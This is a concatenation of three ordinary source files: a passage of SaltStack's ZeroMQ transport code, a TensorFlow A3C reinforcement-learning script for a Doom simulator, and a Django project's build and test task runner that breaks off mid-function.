started') def post_fork(self, payload_handler, io_loop): ''' After forking we need to create all of the local sockets to listen to the router :param func payload_handler: A function to called to handle incoming payloads as they are picked up off the wire :param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling ''' self.payload_handler = payload_handler self.io_loop = io_loop self.context = zmq.Context(1) self._socket = self.context.socket(zmq.REP) self._start_zmq_monitor() if self.opts.get('ipc_mode', '') == 'tcp': self.w_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_workers', 4515) ) else: self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('Worker binding to socket %s', self.w_uri) self._socket.connect(self.w_uri) salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop) self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop) self.stream.on_recv_stream(self.handle_message) @tornado.gen.coroutine def handle_message(self, stream, payload): ''' Handle incoming messages from underlying TCP streams :stream ZMQStream stream: A ZeroMQ stream. See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html :param dict payload: A payload to process ''' try: payload = self.serial.loads(payload[0]) payload = self._decode_payload(payload) except Exception as exc: exc_type = type(exc).__name__ if exc_type == 'AuthenticationError': log.debug( 'Minion failed to auth to master. Since the payload is ' 'encrypted, it is not known which minion failed to ' 'authenticate. It is likely that this is a transient ' 'failure due to the master rotating its public key.' ) else: log.error('Bad load from minion: %s: %s', exc_type, exc) stream.send(self.serial.dumps('bad load')) raise tornado.gen.Return() # TODO helper functions to normalize payload? if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict): log.error('payload and load must be a dict. Payload was: %s and load was %s', payload, payload.get('load')) stream.send(self.serial.dumps('payload and load must be a dict')) raise tornado.gen.Return() try: id_ = payload['load'].get('id', '') if str('\0') in id_: log.error('Payload contains an id with a null byte: %s', payload) stream.send(self.serial.dumps('bad load: id contains a null byte')) raise tornado.gen.Return() except TypeError: log.error('Payload contains non-string id: %s', payload) stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_))) raise tornado.gen.Return() # intercept the "_auth" commands, since the main daemon shouldn't know # anything about our key auth if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth': stream.send(self.serial.dumps(self._auth(payload['load']))) raise tornado.gen.Return() # TODO: test try: # Take the payload_handler function that was registered when we created the channel # and call it, returning control to the caller until it completes ret, req_opts = yield self.payload_handler(payload) except Exception as e: # always attempt to return an error to the minion stream.send('Some exception handling minion payload') log.error('Some exception handling a payload from minion', exc_info=True) raise tornado.gen.Return() req_fun = req_opts.get('fun', 'send') if req_fun == 'send_clear': stream.send(self.serial.dumps(ret)) elif req_fun == 'send': stream.send(self.serial.dumps(self.crypticle.dumps(ret))) elif req_fun == 'send_private': stream.send(self.serial.dumps(self._encrypt_private(ret, req_opts['key'], req_opts['tgt'], ))) else: log.error('Unknown req_fun %s', req_fun) # always attempt to return an error to the minion stream.send('Server-side exception handling payload') raise tornado.gen.Return() def __setup_signals(self): signal.signal(signal.SIGINT, self._handle_signals) signal.signal(signal.SIGTERM, self._handle_signals) def _handle_signals(self, signum, sigframe): msg = '{0} received a '.format(self.__class__.__name__) if signum == signal.SIGINT: msg += 'SIGINT' elif signum == signal.SIGTERM: msg += 'SIGTERM' msg += '. Exiting' log.debug(msg) self.close() sys.exit(salt.defaults.exitcodes.EX_OK) def _set_tcp_keepalive(zmq_socket, opts): ''' Ensure that TCP keepalives are set as specified in "opts". Warning: Failure to set TCP keepalives on the salt-master can result in not detecting the loss of a minion when the connection is lost or when it's host has been terminated without first closing the socket. Salt's Presence System depends on this connection status to know if a minion is "present". Warning: Failure to set TCP keepalives on minions can result in frequent or unexpected disconnects! ''' if hasattr(zmq, 'TCP_KEEPALIVE') and opts: if 'tcp_keepalive' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE, opts['tcp_keepalive'] ) if 'tcp_keepalive_idle' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle'] ) if 'tcp_keepalive_cnt' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt'] ) if 'tcp_keepalive_intvl' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl'] ) class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel): ''' Encapsulate synchronous operations for a publisher channel ''' def __init__(self, opts): self.opts = opts self.serial = salt.payload.Serial(self.opts) # TODO: in init? self.ckminions = salt.utils.minions.CkMinions(self.opts) def connect(self): return tornado.gen.sleep(5) def _publish_daemon(self): ''' Bind to the interface specified in the configuration file ''' salt.utils.process.appendproctitle(self.__class__.__name__) # Set up the context context = zmq.Context(1) # Prepare minion publish socket pub_sock = context.socket(zmq.PUB) _set_tcp_keepalive(pub_sock, self.opts) # if 2.1 >= zmq < 3.0, we only have one HWM setting try: pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000)) # in zmq >= 3.0, there are separate send and receive HWM settings except AttributeError: # Set the High Water Marks. For more information on HWM, see: # http://api.zeromq.org/4-1:zmq-setsockopt pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000)) pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000)) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses pub_sock.setsockopt(zmq.IPV4ONLY, 0) pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000)) pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts) # Prepare minion pull socket pull_sock = context.socket(zmq.PULL) if self.opts.get('ipc_mode', '') == 'tcp': pull_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_publish_pull', 4514) ) else: pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) salt.utils.zeromq.check_ipc_path_max_len(pull_uri) # Start the minion command publisher log.info('Starting the Salt Publisher on %s', pub_uri) pub_sock.bind(pub_uri) # Securely create socket log.info('Starting the Salt Puller on %s', pull_uri) with salt.utils.files.set_umask(0o177): pull_sock.bind(pull_uri) try: while True: # Catch and handle EINTR from when this process is sent # SIGUSR1 gracefully so we don't choke and die horribly try: log.trace('Getting data from puller %s', pull_uri) package = pull_sock.recv() unpacked_package = salt.payload.unpackage(package) if six.PY3: unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package) payload = unpacked_package['payload'] log.trace('Accepted unpacked package from puller') if self.opts['zmq_filtering']: # if you have a specific topic list, use that if 'topic_lst' in unpacked_package: for topic in unpacked_package['topic_lst']: log.trace('Sending filtered data over publisher %s', pub_uri) # zmq filters are substring match, hash the topic # to avoid collisions htopic = salt.utils.stringutils.to_bytes(hashlib.sha1(topic).hexdigest()) pub_sock.send(htopic, flags=zmq.SNDMORE) pub_sock.send(payload) log.trace('Filtered data has been sent') # Syndic broadcast if self.opts.get('order_masters'): log.trace('Sending filtered data to syndic') pub_sock.send(b'syndic', flags=zmq.SNDMORE) pub_sock.send(payload) log.trace('Filtered data has been sent to syndic') # otherwise its a broadcast else: # TODO: constants file for "broadcast" log.trace('Sending broadcasted data over publisher %s', pub_uri) pub_sock.send(b'broadcast', flags=zmq.SNDMORE) pub_sock.send(payload) log.trace('Broadcasted data has been sent') else: log.trace('Sending ZMQ-unfiltered data over publisher %s', pub_uri) pub_sock.send(payload) log.trace('Unfiltered data has been sent') except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except KeyboardInterrupt: # Cleanly close the sockets if we're shutting down if pub_sock.closed is False: pub_sock.setsockopt(zmq.LINGER, 1) pub_sock.close() if pull_sock.closed is False: pull_sock.setsockopt(zmq.LINGER, 1) pull_sock.close() if context.closed is False: context.term() def pre_fork(self, process_manager): ''' Do anything necessary pre-fork. Since this is on the master side this will primarily be used to create IPC channels and create our daemon process to do the actual publishing :param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager ''' process_manager.add_process(self._publish_daemon) def publish(self, load): ''' Publish "load" to minions :param dict load: A load to be sent across the wire to minions ''' payload = {'enc': 'aes'} crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value) payload['load'] = crypticle.dumps(load) if self.opts['sign_pub_messages']: master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem') log.debug("Signing data packet") payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load']) # Send 0MQ to the publisher context = zmq.Context(1) pub_sock = context.socket(zmq.PUSH) if self.opts.get('ipc_mode', '') == 'tcp': pull_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_publish_pull', 4514) ) else: pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) pub_sock.connect(pull_uri) int_payload = {'payload': self.serial.dumps(payload)} # add some targeting stuff for lists only (for now) if load['tgt_type'] == 'list': int_payload['topic_lst'] = load['tgt'] # If zmq_filtering is enabled, target matching has to happen master side match_targets = ["pcre", "glob", "list"] if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets: # Fetch a list of minions that match _res = self.ckminions.check_minions(load['tgt'], tgt_type=load['tgt_type']) match_ids = _res['minions'] log.debug("Publish Side Match: %s", match_ids) # Send list of miions thru so zmq can target them int_payload['topic_lst'] = match_ids pub_sock.send(self.serial.dumps(int_payload)) pub_sock.close() context.term() class AsyncReqMessageClientPool(salt.transport.MessageClientPool): ''' Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket. ''' def __init__(self, opts, args=None, kwargs=None): super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs) def __del__(self): self.destroy() def destroy(self): for message_client in self.message_clients: message_client.destroy() self.message_clients = [] def send(self, *args, **kwargs): message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue)) return message_clients[0].send(*args, **kwargs) # TODO: unit tests! class AsyncReqMessageClient(object): ''' This class wraps the underlying zeromq REQ socket and gives a future-based interface to sending and recieving messages. This works around the primary limitation of serialized send/recv on the underlying socket by queueing the message sends in this class. In the future if we decide to attempt to multiplex we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial ''' def __init__(self, opts, addr, linger=0, io_loop=None): ''' Create an asynchronous message client :param dict opts: The salt opts dictionary :param str addr: The interface IP address to bind to :param int linger: The number of seconds to linger on a ZMQ socket. See http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER] :param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop] ''' self.opts = opts self.addr = addr self.linger = linger if io_loop is None: install_zmq() ZMQDefaultLoop.current() else: self.io_loop = io_loop self.serial = salt.payload.Serial(self.opts) self.context = zmq.Context() # wire up sockets self._init_socket() self.send_queue = [] # mapping of message -> future self.send_future_map = {} self.send_timeout_map = {} # message -> timeout # TODO: timeout all in-flight sessions, or error def destroy(self): if hasattr(self, 'stream') and self.stream is not None: if ZMQ_VERSION_INFO < (14, 3, 0): # stream.close() doesn't work properly on pyzmq < 14.3.0 if self.stream.socket: self.stream.socket.close() self.stream.io_loop.remove_handler(self.stream.socket) # set this to None, more hacks for messed up pyzmq self.stream.socket = None self.socket.close() else: self.stream.close() self.socket = None self.stream = None if self.context.closed is False: self.context.term() def __del__(self): self.destroy() def _init_socket(self): if hasattr(self, 'stream'): self.stream.close() # pylint: disable=E0203 self.socket.close() # pylint: disable=E0203 del self.stream del self.socket self.socket = self.context.socket(zmq.REQ) # socket options if hasattr(zmq, 'RECONNECT_IVL_MAX'): self.socket.setsockopt( zmq.RECONNECT_IVL_MAX, 5000 ) _set_tcp_keepalive(self.socket, self.opts) if self.addr.startswith('tcp://['): # Hint PF type if bracket enclosed IPv6 address if hasattr(zmq, 'IPV6'): self.socket.setsockopt(zmq.IPV6, 1) elif hasattr(zmq, 'IPV4ONLY'): self.socket.setsockopt(zmq.IPV4ONLY, 0) self.socket.linger = self.linger log.debug('Trying to connect to: %s', self.addr) self.socket.connect(self.addr) self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop) @tornado.gen.coroutine def _internal_send_recv(self): while len(self.send_queue) > 0: message = self.send_queue[0] future = self.send_future_map.get(message, None) if future is None: # Timedout del self.send_queue[0] continue # send def mark_future(msg): if not future.done(): data = self.serial.loads(msg[0]) future.set_result(data) self.stream.on_recv(mark_future) self.stream.send(message) try: ret = yield future except Exception as err: # pylint: disable=W0702 log.debug('Re-init ZMQ socket: %s', err) self._init_socket() # re-init the zmq socket (no other way in zmq) del self.send_queue[0] continue del self.send_queue[0] self.send_future_map.pop(message, None) self.remove_message_timeout(message) def remove_message_timeout(self, message): if message not in self.send_timeout_map: return timeout = self.send_timeout_map.pop(message, None) if timeout is not None: # Hasn't been already timedout self.io_loop.remove_timeout(timeout) def timeout_message(self, message): ''' Handle a message timeout by removing it from the sending queue and informing the caller :raises: SaltReqTimeoutError ''' future = self.send_future_map.pop(message, None) # In a race condition the message might have been sent by the time # we're timing it out. Make sure the future is not None if future is not None: del self.send_timeout_map[message] if future.attempts < future.tries: future.attempts += 1 log.debug('SaltReqTimeoutError, retrying. (%s/%s)', future.attempts, future.tries) self.send( message, timeout=future.timeout, tries=future.tries, future=future, ) else: future.set_exception(SaltReqTimeoutError('Message timed out')) def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False): ''' Return a future which will be completed when the message has a response ''' if future is None: future = tornado.concurrent.Future() future.tries = tries future.attempts = 0 future.timeout = timeout # if a future wasn't passed in, we need to serialize the message message = self.serial.dumps(message) if callback is not None: def handle_future(future): response = future.result() self.io_loop.add_callback(callback, response) future.add_done_callback(handle_future) # Add this future to the mapping self.send_future_map[message] = future if self.opts.get('detect_mode') is True: timeout = 1 if timeout is not None: send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message) self.send_timeout_map[message] = send_timeout if len(self.send_queue) == 0: self.io_loop.spawn_callback(self._internal_send_recv) self.send_queue.append(message) return future class ZeroMQSocketMonitor(object): __EVENT_MAP = None def __init__(self, socket): ''' Create ZMQ monitor sockets More information: http://api.zeromq.org/4-0:zmq-socket-monitor ''' self._socket = socket self._monitor_socket = self._socket.get_monitor_socket() self._monitor_stream = None def start_io_loop(self, io_loop): log.trace("Event monitor start!") self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop) self._monitor_stream.on_recv(self.monitor_callback) def start_poll(self): log.trace("Event monitor start!") try: while self._monitor_socket is not None and self._monitor_socket.poll(): msg = self._monitor_socket.recv_multipart() self.monitor_callback(msg) except (AttributeError, zmq.error.ContextTerminated): # We cannot log here because we'll get an interrupted system call in trying # to flush the logging buffer as we terminate pass @property def event_map(self): if ZeroMQSocketMonitor.__EVENT_MAP is None: event_map = {} for name in dir(zmq): if name.startswith('EVENT_'): value = getattr(zmq, name) event_map[value] = name ZeroMQSocketMonitor.__EVENT_MAP = event_map return ZeroMQSocketMonitor.__EVENT_MAP def monitor_callback(self, msg): evt = zmq.utils.monitor.parse_monitor_message(msg) evt['description'] = self.event_map[evt['event']] log.debug("ZeroMQ event: %s", evt) if evt['event'] == zmq.EVENT_MONITOR_STOPPED: self.stop() def stop(self): if self._socket is None: return self._socket.disable_monitor() self._socket = None self._monitor_socket = None if self._monitor_stream is not None: self._monitor_stream.close() self._monitor_stream = None log.trace("Event monitor done!")
a3c-standard.py
import tensorflow as tf from time import sleep import threading import numpy as np from tensorflow.contrib import slim import time import scipy.signal import cv2 #import gym import csv from scipy.ndimage.filters import gaussian_filter1d from simulator import simulator num_workers = 6 environment = 'Doom_Basic' set_learning_rate = 1e-4 no_of_actions = 3 clip_using_norm = True clip_norm_magnitude = 40.0 clip_value_magnitude = 0.001 lives = 5 logfilename = 'scores_'+str(environment)+'_w'+str(num_workers)+'_standard.csv' def process_frame(x): #image preprocessing following http://karpathy.github.io/2016/05/31/rl/ #s = frame[10:-10,30:-30] s = cv2.resize(x,(84,84)) #s = np.reshape(s,[np.prod(s.shape)]) / 255.0 return s.reshape(-1) class experience(): #experience buffer for storing trajectories and rewards def __init__(self,cfg): self.episode_buffer = [] def add_experience(self,x): self.episode_buffer.append(x) def reset(self): self.episode_buffer = [] class cfg(): #cfg class for hyperparameters def __init__(self): self.gamma = 0.99 #discount rate self.s_size = 7056*2 #input to network(flattened image vector) self.a_size = no_of_actions #number of actions (Pong-specific) cfg = cfg() #initialize cfg class a_size = cfg.a_size #normalized_columns_initializer lifted from https://medium.com/emergent-future/simple-reinforcement-learning-with-tensorflow-part-8-asynchronous-actor-critic-agents-a3c-c88f72a5e9f2 def normalized_columns_initializer(std=1.0): def _initializer(shape, dtype=None, partition_info=None): out = np.random.randn(*shape).astype(np.float32) out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True)) out[out > 1.0] = 1.0; out[out < -1.0] = -1.0 return tf.constant(out) return _initializer def modify_gradients(x): x = [tf.where(tf.is_nan(grad),tf.zeros_like(grad),grad) for grad in x] x = [tf.where(tf.equal(grad,np.inf),tf.zeros_like(grad),grad) for grad in x] x = [tf.where(tf.equal(grad,-np.inf),tf.zeros_like(grad),grad) for grad in x] if clip_using_norm == True: x,_ = tf.clip_by_global_norm(x,clip_norm_magnitude) #clipping operation using global norm else: x = [tf.clip_by_value(grad,-clip_value_magnitude,+clip_value_magnitude) for grad in x] #alternative clipping operation using clip by value return x def create_network(inputs): net = tf.reshape(inputs,[-1,84,84,1]) net = slim.conv2d( \ inputs=net,num_outputs=32,kernel_size=[8,8],stride=[4,4],padding='VALID',biases_initializer=None,activation_fn=tf.nn.relu) net = slim.conv2d( \ inputs=net,num_outputs=64,kernel_size=[4,4],stride=[2,2],padding='VALID',biases_initializer=None,activation_fn=tf.nn.relu) net = slim.conv2d( \ inputs=net,num_outputs=64,kernel_size=[3,3],stride=[1,1],padding='VALID',biases_initializer=None,activation_fn=tf.nn.relu) fc_h = slim.fully_connected(slim.flatten(net),256,activation_fn=tf.nn.relu) policy = slim.fully_connected(fc_h,a_size, activation_fn=tf.nn.softmax, weights_initializer=normalized_columns_initializer(0.01), biases_initializer=None) value = slim.fully_connected(fc_h,1, activation_fn=None, weights_initializer=normalized_columns_initializer(0.01), biases_initializer=None) return policy, value class AC_Network(): def __init__(self,s_size,a_size,scope,trainer): s_size = s_size/2 with tf.variable_scope(scope): self.inputs = tf.placeholder(tf.float32,[None,s_size]) self.policy, self.value = create_network(self.inputs) if scope != 'global': self.actions = tf.placeholder(shape=[None],dtype=tf.int32) self.actions_onehot = tf.one_hot(self.actions,a_size,dtype=tf.float32) self.target_v = tf.placeholder(shape=[None],dtype=tf.float32) self.advantages = tf.placeholder(shape=[None],dtype=tf.float32) self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1]) self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value,[-1]))) self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy)) self.policy_loss = -0.5 * tf.reduce_sum(tf.log(self.responsible_outputs)*self.advantages) self.loss = self.value_loss + self.policy_loss - self.entropy * 0.01 local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope) global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global') self.gradients = tf.gradients(self.loss,local_vars) self.gradients = modify_gradients(self.gradients) #self.gradients,_ = tf.clip_by_global_norm(self.gradients,40.0) self.apply_grads = trainer.apply_gradients(zip(self.gradients,global_vars)) def update_target_graph(from_scope,to_scope): from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope) to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope) op_holder = [] for from_var,to_var in zip(from_vars,to_vars): op_holder.append(to_var.assign(from_var)) return op_holder def discount(x, gamma): return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1] def discountx(r,gamma): """ take 1D float array of rewards and compute discounted reward """ discounted_r = np.zeros_like(r) running_add = 0 for t in reversed(range(0, r.size)): #if r[t] != 0.0: running_add = 0 # reset the sum, since this was a game boundary (pong specific!) running_add = running_add * gamma + r[t] discounted_r[t] = running_add return discounted_r global_max = np.zeros(num_workers) class Worker(): def __init__(self,name,trainer,cfg): self.name = "worker_" + str(name) self.number = name self.trainer = trainer self.cfg = cfg self.local_AC = AC_Network(self.cfg.s_size,self.cfg.a_size,self.name,trainer) self.update_local_ops = update_target_graph('global',self.name) self.env = simulator(a_size) self.experience = experience(self.cfg) def train(self,rollout,sess,gamma,bootstrap_value): rollout = np.array(rollout) observations = rollout[:,0] actions = rollout[:,1] rewards = rollout[:,2] next_observations = rollout[:,3] values = rollout[:,5] #t0 = time.time() self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value]) discounted_rewards = discountx(self.rewards_plus,0.99) self.value_plus = np.asarray(values.tolist() + [bootstrap_value]) advantages = rewards + 0.99*discounted_rewards[1:] - self.value_plus[:-1] feed_dict = {self.local_AC.target_v:discounted_rewards[:-1], self.local_AC.inputs:np.vstack(observations), self.local_AC.actions:actions, self.local_AC.advantages:advantages} v_l,_ = sess.run([self.local_AC.value_loss, self.local_AC.apply_grads], feed_dict=feed_dict) sess.run(self.update_local_ops) #print (time.time() - t0) return v_l / len(rollout) def work(self,sess,coord,saver): total_steps = 0 print ("Starting worker " + str(self.number)) stats = 0.0 losers = 0.0 steps = 0.0 global lives with sess.as_default(), sess.graph.as_default(): while not coord.should_stop(): sess.run(self.update_local_ops) episode_step_count = 0 d = False self.experience.reset() self.env.initialize() s = self.env.fetch() s = process_frame(s) while d == False: a_dist,v = sess.run([self.local_AC.policy,self.local_AC.value], feed_dict={self.local_AC.inputs:[s]}) a_dist = a_dist.reshape(-1) a = np.random.choice(a_dist,p=a_dist) a = np.argmax(a_dist == a) r,d = self.env.move(a) r = r/100.0 if r == 1.0: stats += 1.0 if d == False: s1 = self.env.fetch() show = s1 s1 = process_frame(s1) else: steps += 1.0 s1 = s self.experience.add_experience([s,a,r,s1,d,v[0,0]]) #add to experience buffer if self.number == 0: #cv2.imshow("",show) #cv2.waitKey(1) if total_steps % 10000 == 0: print(total_steps) if total_steps % int(50000/8) == 0: print("") print("wins : " + str(stats*8.0)) print("loss : " + str(losers*8.0)) print("steps : " + str(steps*8.0)) print("kill stat: " + str(stats/((steps)+1.0))) print("") with open(logfilename,'a') as f: writer = csv.writer(f) writer.writerow([stats,losers,steps,total_steps]) steps = 0 stats = 0.0 losers = 0.0 s = s1 episode_step_count += 1 total_steps += 1 if len(self.experience.episode_buffer) == 32 and d != True: bootstrap_value = sess.run([self.local_AC.value], feed_dict={self.local_AC.inputs:[s1]}) #get bootstrap self.train(self.experience.episode_buffer,sess,self.cfg.gamma,bootstrap_value[0]) #call train procedure self.experience.reset() if d == True: break if len(self.experience.episode_buffer) != 0: self.train(self.experience.episode_buffer,sess,self.cfg.gamma,0.0) #call train procedure self.experience.reset() if __name__ == "__main__": tf.reset_default_graph() trainer = tf.train.AdamOptimizer(learning_rate=set_learning_rate) #trainer = tf.train.MomentumOptimizer(learning_rate=1e-3,momentum=0.9,use_nesterov=False) #trainer = tf.train.GradientDescentOptimizer(learning_rate=1e-6) master_network = AC_Network(cfg.s_size,cfg.a_size,'global',None) workers = [] config = tf.ConfigProto() config.gpu_options.allow_growth=True for i in range(num_workers): workers.append(Worker(i,trainer,cfg)) saver = tf.train.Saver(max_to_keep=5) with tf.Session(config=config) as sess: coord = tf.train.Coordinator() sess.run(tf.global_variables_initializer()) worker_threads = [] for worker in workers: worker_work = lambda: worker.work(sess,coord,saver) t = threading.Thread(target=(worker_work)) t.start() sleep(0.5) worker_threads.append(t) coord.join(worker_threads)
tasks.py
import functools import os import sys import threading import pkg_resources from .executor import Context, Tasks, TaskError from .paths import in_dir, paths_for_shell tasks = Tasks() @tasks.register('dependencies', 'additional_assets', 'bundles', 'collect_static_files', 'take_screenshots', 'compile_messages', 'precompile_python_code', default=True) def build(_: Context): """ Builds all necessary assets """ @tasks.register('build') def start(context: Context, port=8000): """ Starts a development server """ # NB: if called in the same interpreter, cannot use auto-reloading else all tasks re-run # context.management_command('runserver', addrport=f'0:{port}', use_reloader=False) return context.shell(sys.executable, 'manage.py', 'runserver', f'0:{port}') @tasks.register('build') def serve(context: Context, port=8000, browsersync_port=3000, browsersync_ui_port=3030): """ Starts a development server with auto-building and live-reload """ from watchdog.events import PatternMatchingEventHandler from watchdog.observers import Observer class RebuildHandler(PatternMatchingEventHandler): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._patterns = ['*.js', '*.scss', '*.html'] self._ignore_directories = True self.builder = None self.rebuild_javascript = threading.Event() self.rebuild_stylesheets = threading.Event() def on_any_event(self, event): if self.builder: self.builder.cancel() extension = event.src_path.rsplit('.', 1)[-1].lower() if extension == 'js': self.rebuild_javascript.set() elif extension == 'scss': self.rebuild_stylesheets.set() self.builder = threading.Timer(3, self.rebuild) self.builder.start() def rebuild(self): if self.rebuild_javascript.is_set(): self.rebuild_javascript.clear() context.debug('Triggering javascript build') bundle_javascript(context) if self.rebuild_stylesheets.is_set(): self.rebuild_stylesheets.clear() context.debug('Triggering stylesheet build') bundle_stylesheets(context) context.debug('Reloading browsers') context.node_tool('browser-sync', 'reload', f'--port={browsersync_port}') context.info('Watching sources') observer = Observer() paths = [ context.app.common_asset_source_path, context.app.asset_source_path, context.app.common_templates_path, context.app.templates_path, ] handler = RebuildHandler() for path in paths: observer.schedule(handler, path, recursive=True) observer.setDaemon(True) observer.start() context.info('Starting browser sync') browsersync_args = ['start', '--host=localhost', '--no-open', '--logLevel', {0: 'silent', 1: 'info', 2: 'debug'}[context.verbosity], f'--port={browsersync_port}', f'--proxy=localhost:{port}', f'--ui-port={browsersync_ui_port}'] browsersync = functools.partial(context.node_tool, 'browser-sync', *browsersync_args) threading.Thread(target=browsersync, daemon=True).start() context.info('Starting web server') return start(context, port=port) @tasks.register('build', 'lint') def test(context: Context, test_labels=None, functional_tests=False, accessibility_tests=False, webdriver=None): """ Tests the app """ if accessibility_tests: functional_tests = True os.environ['RUN_ACCESSIBILITY_TESTS'] = '1' if functional_tests: os.environ['RUN_FUNCTIONAL_TESTS'] = '1' if webdriver: os.environ['WEBDRIVER'] = webdriver test_labels = (test_labels or '').split() return context.management_command('test', *test_labels, interactive=False) @tasks.register(hidden=True) def create_build_paths(context: Context): """ Creates directories needed for build outputs """ paths = [ context.app.asset_build_path, context.app.scss_build_path, context.app.screenshots_build_path, context.app.collected_assets_path, ] for path in filter(None, paths): os.makedirs(path, exist_ok=True) @tasks.register(hidden=True) def python_dependencies(context: Context, common_path=None): """ Updates python dependencies """ context.pip_command('install', '-r', context.requirements_file) if common_path: context.pip_command('uninstall', '--yes', 'money-to-prisoners-common') context.pip_command('install', '--force-reinstall', '-e', common_path) context.shell('rm', '-rf', 'webpack.config.js') # because it refers to path to common @tasks.register(hidden=True) def package_json(context: Context): """ Generates a package.json file """ context.write_template('package.json') @tasks.register('package_json', hidden=True) def node_dependencies(context: Context): """ Updates node.js dependencies """ args = ['--loglevel', {0: 'silent', 1: 'warn', 2: 'info'}[context.verbosity]] if not context.use_colour: args.append('--color false') args.append('install') return context.shell('npm', *args) @tasks.register('python_dependencies', 'node_dependencies', hidden=True) def dependencies(_: Context): """ Updates all dependencies """ @tasks.register(hidden=True) def docker_compose_config(context: Context, port=8000): """ Generates a docker-compose.yml file """ context.write_template('docker-compose.yml', context={ 'port': port, }) @tasks.register('docker_compose_config', hidden=True) def local_docker(context: Context): """ Runs the app in a docker container; for local development only! Once performed, `docker-compose up` can be used directly """ args = () if context.verbosity > 1: args += ('--verbose',) args += ('up', '--build', '--remove-orphans') if not context.use_colour: args += ('--no-color',) context.shell('docker-compose', *args) @tasks.register(hidden=True) def webpack_config(context: Context): """ Generates a webpack.config.js file """ context.write_template('webpack.config.js') @tasks.register('create_build_paths', 'node_dependencies', 'webpack_config', hidden=True) def bundle_javascript(context: Context, production_bundle=False): """ Compiles javascript """ args = ['--bail'] if not context.use_colour: args.append('--no-color') if production_bundle: args.append('--mode=production') return context.node_tool('webpack', *args) @tasks.register('create_build_paths', 'node_dependencies', hidden=True) def bundle_stylesheets(context: Context, production_bundle=False): """ Compiles stylesheets """ def make_output_file(css_path): css_name = os.path.basename(css_path) base_name = os.path.splitext(css_name)[0] return os.path.join(context.app.scss_build_path, f'{base_name}.css') style = 'compressed' if production_bundle else 'nested' args = [ 'pysassc', # pysassc entrypoint always removes the first item f'--output-style={style}', ] for path in context.app.scss_include_paths: args.append(f'--include-path={path}') return_code = 0 pysassc = pkg_resources.load_entry_point('libsass', 'console_scripts', 'pysassc') for source_file in context.app.scss_source_file_set.paths_for_shell(separator=None): context.info(f'Building {source_file}') pysassc_args = [*args + [source_file, make_output_file(source_file)]] return_code = pysassc(pysassc_args) or return_code return return_code @tasks.register('bundle_javascript', 'bundle_stylesheets', hidden=True) def bundles(_: Context): """ Compiles assets """ @tasks.register(hidden=True) def lint_config(context: Context): """ Generates javasript and stylesheet linting configuration files """ context.write_template('eslintrc.json', path='.eslintrc.json') context.write_template('sass-lint.yml', path='.sass-lint.yml') @tasks.register('node_dependencies', 'lint_config', hidden=True) def lint_javascript(context: Context): """ Tests javascript for code and style errors """ args = ['--format', 'stylish'] if context.verbosity == 0: args.append('--quiet') if not context.use_colour: args.append('--no-color') args.append(context.app.javascript_source_path) return context.node_tool('eslint', *args) @tasks.register('node_dependencies', 'lint_config', hidden=True) def lint_stylesheets(context: Context): """ Tests stylesheets for code and style errors """ args = ['--format', 'stylish', 